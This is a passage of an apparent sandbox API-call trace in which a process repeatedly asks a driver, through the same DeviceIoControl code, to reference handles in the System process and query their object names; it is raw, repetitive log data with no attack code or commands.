KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.586] ObReferenceObjectByHandle (in: Handle=0xffffffff8000072c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e813b0, HandleInformation=0x0) returned 0x0 [0119.586] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.586] PsReleaseProcessExitSynchronization () returned 0x2 [0119.586] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.586] ObQueryNameString (in: Object=0xfffffa8001e813b0, ObjectNameInfo=0xfffffa8002893044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002893044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.586] ObfDereferenceObject (Object=0xfffffa8001e813b0) returned 0x2 [0119.586] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.586] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.586] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.586] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.586] PsAcquireProcessExitSynchronization () returned 0x0 [0119.586] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.586] ObReferenceObjectByHandle (in: Handle=0xffffffff80000730, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed1200, HandleInformation=0x0) returned 0x0 [0119.586] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.586] PsReleaseProcessExitSynchronization () returned 0x2 [0119.587] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.587] ObQueryNameString (in: Object=0xfffffa8001ed1200, ObjectNameInfo=0xfffffa8002888044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002888044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.587] ObfDereferenceObject (Object=0xfffffa8001ed1200) returned 0x2 [0119.587] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.587] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.587] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.587] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.587] PsAcquireProcessExitSynchronization () returned 0x0 [0119.799] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.800] ObReferenceObjectByHandle (in: Handle=0xffffffff80000734, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ecdd20, HandleInformation=0x0) returned 0x0 [0119.800] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.800] PsReleaseProcessExitSynchronization () returned 0x2 [0119.800] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.800] ObQueryNameString (in: Object=0xfffffa8001ecdd20, ObjectNameInfo=0xfffffa8002889044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002889044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.800] ObfDereferenceObject (Object=0xfffffa8001ecdd20) returned 0x2 [0119.800] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.800] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.800] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.800] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.800] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.800] PsAcquireProcessExitSynchronization () returned 0x0 [0119.800] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.800] ObReferenceObjectByHandle (in: Handle=0xffffffff80000738, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed1890, HandleInformation=0x0) returned 0x0 [0119.800] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.800] PsReleaseProcessExitSynchronization () returned 0x2 [0119.800] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.800] ObQueryNameString (in: Object=0xfffffa8001ed1890, ObjectNameInfo=0xfffffa8002890044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002890044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.801] ObfDereferenceObject (Object=0xfffffa8001ed1890) returned 0x2 [0119.801] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.801] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.801] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.801] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.801] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.801] PsAcquireProcessExitSynchronization () returned 0x0 [0119.801] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.801] ObReferenceObjectByHandle (in: Handle=0xffffffff8000073c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ecd690, HandleInformation=0x0) returned 0x0 [0119.801] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.801] PsReleaseProcessExitSynchronization () returned 0x2 [0119.801] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.801] ObQueryNameString (in: Object=0xfffffa8001ecd690, ObjectNameInfo=0xfffffa80028856c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028856c4, ReturnLength=0xfffff88005163550) returned 0x0 [0119.801] ObfDereferenceObject (Object=0xfffffa8001ecd690) returned 0x2 [0119.801] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.801] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.801] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.802] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.802] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.802] PsAcquireProcessExitSynchronization () returned 0x0 [0119.802] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.802] ObReferenceObjectByHandle (in: Handle=0xffffffff80000740, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed0e50, HandleInformation=0x0) returned 0x0 [0119.802] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.802] PsReleaseProcessExitSynchronization () returned 0x2 [0119.802] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.802] ObQueryNameString (in: Object=0xfffffa8001ed0e50, ObjectNameInfo=0xfffffa800288b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288b044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.802] ObfDereferenceObject (Object=0xfffffa8001ed0e50) returned 0x2 [0119.802] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.802] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.802] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.802] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.802] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.802] PsAcquireProcessExitSynchronization () returned 0x0 [0119.802] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.802] ObReferenceObjectByHandle (in: Handle=0xffffffff80000744, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ecee50, HandleInformation=0x0) returned 0x0 [0119.802] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.802] PsReleaseProcessExitSynchronization () returned 0x2 [0119.802] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.803] ObQueryNameString (in: Object=0xfffffa8001ecee50, ObjectNameInfo=0xfffffa8002895044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002895044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.803] ObfDereferenceObject (Object=0xfffffa8001ecee50) returned 0x2 [0119.803] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.803] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.803] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.803] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.803] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.803] PsAcquireProcessExitSynchronization () returned 0x0 [0119.803] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.803] ObReferenceObjectByHandle (in: Handle=0xffffffff80000748, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed07c0, HandleInformation=0x0) returned 0x0 [0119.803] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.803] PsReleaseProcessExitSynchronization () returned 0x2 [0119.803] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.803] ObQueryNameString (in: Object=0xfffffa8001ed07c0, ObjectNameInfo=0xfffffa8002894044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002894044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.803] ObfDereferenceObject (Object=0xfffffa8001ed07c0) returned 0x2 [0119.803] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.803] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.803] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.803] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.803] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.804] PsAcquireProcessExitSynchronization () returned 0x0 [0119.804] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.804] ObReferenceObjectByHandle (in: Handle=0xffffffff8000074c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ece7c0, HandleInformation=0x0) returned 0x0 [0119.804] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.804] PsReleaseProcessExitSynchronization () returned 0x2 [0119.804] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.804] ObQueryNameString (in: Object=0xfffffa8001ece7c0, ObjectNameInfo=0xfffffa800288e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288e044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.804] ObfDereferenceObject (Object=0xfffffa8001ece7c0) returned 0x2 [0119.804] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.804] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.804] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.804] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.804] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.804] PsAcquireProcessExitSynchronization () returned 0x0 [0119.804] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.804] ObReferenceObjectByHandle (in: Handle=0xffffffff80000750, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed1f20, HandleInformation=0x0) returned 0x0 [0119.804] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.804] PsReleaseProcessExitSynchronization () returned 0x2 [0119.804] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.804] ObQueryNameString (in: Object=0xfffffa8001ed1f20, ObjectNameInfo=0xfffffa8002891044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002891044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.804] ObfDereferenceObject (Object=0xfffffa8001ed1f20) returned 0x2 [0119.804] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.805] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.805] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.805] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.805] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.805] PsAcquireProcessExitSynchronization () returned 0x0 [0119.805] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.805] ObReferenceObjectByHandle (in: Handle=0xffffffff80000754, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ecf050, HandleInformation=0x0) returned 0x0 [0119.805] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.805] PsReleaseProcessExitSynchronization () returned 0x2 [0119.805] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.805] ObQueryNameString (in: Object=0xfffffa8001ecf050, ObjectNameInfo=0xfffffa80028ab044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028ab044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.805] ObfDereferenceObject (Object=0xfffffa8001ecf050) returned 0x2 [0119.805] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.805] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.805] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.805] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.805] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.805] PsAcquireProcessExitSynchronization () returned 0x0 [0119.805] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.805] ObReferenceObjectByHandle (in: Handle=0xffffffff80000794, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034b9dc0, HandleInformation=0x0) returned 0x0 [0119.805] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.805] PsReleaseProcessExitSynchronization () returned 0x2 [0119.805] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.805] ObQueryNameString (in: Object=0xfffffa80034b9dc0, ObjectNameInfo=0xfffffa800288a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288a044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.806] ObfDereferenceObject (Object=0xfffffa80034b9dc0) returned 0x2 [0119.806] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.806] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.806] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.806] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.806] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.806] PsAcquireProcessExitSynchronization () returned 0x0 [0119.806] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.806] ObReferenceObjectByHandle (in: Handle=0xffffffff80000798, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f952c0, HandleInformation=0x0) returned 0x0 [0119.806] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.806] PsReleaseProcessExitSynchronization () returned 0x2 [0119.806] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.806] ObQueryNameString (in: Object=0xfffffa8001f952c0, ObjectNameInfo=0xfffffa800288f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288f044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.806] ObfDereferenceObject (Object=0xfffffa8001f952c0) returned 0x2 [0119.806] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.806] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.806] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.806] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.806] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.806] PsAcquireProcessExitSynchronization () returned 0x0 [0119.806] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.806] ObReferenceObjectByHandle (in: Handle=0xffffffff8000079c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a39120, HandleInformation=0x0) returned 0x0 [0119.806] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.806] PsReleaseProcessExitSynchronization () returned 0x2 [0119.806] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.806] ObQueryNameString (in: Object=0xfffffa8003a39120, ObjectNameInfo=0xfffffa8002892044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002892044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.807] ObfDereferenceObject (Object=0xfffffa8003a39120) returned 0x2 [0119.807] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.807] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.807] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.807] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.807] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.807] PsAcquireProcessExitSynchronization () returned 0x0 [0119.807] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.807] ObReferenceObjectByHandle (in: Handle=0xffffffff800007a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003ada250, HandleInformation=0x0) returned 0x0 [0119.807] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.807] PsReleaseProcessExitSynchronization () returned 0x2 [0119.807] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.807] ObQueryNameString (in: Object=0xfffffa8003ada250, ObjectNameInfo=0xfffffa8002893044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002893044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.807] ObfDereferenceObject (Object=0xfffffa8003ada250) returned 0x2 [0119.807] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.807] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.807] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.807] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0119.808] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.808] PsAcquireProcessExitSynchronization () returned 0x0 [0119.808] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.808] ObReferenceObjectByHandle (in: Handle=0xffffffff800007a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800280f350, HandleInformation=0x0) returned 0x0 [0119.808] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.808] PsReleaseProcessExitSynchronization () returned 0x2 [0119.808] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.808] ObQueryNameString (in: Object=0xfffffa800280f350, ObjectNameInfo=0xfffffa8002888044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002888044, ReturnLength=0xfffff88005163550) returned 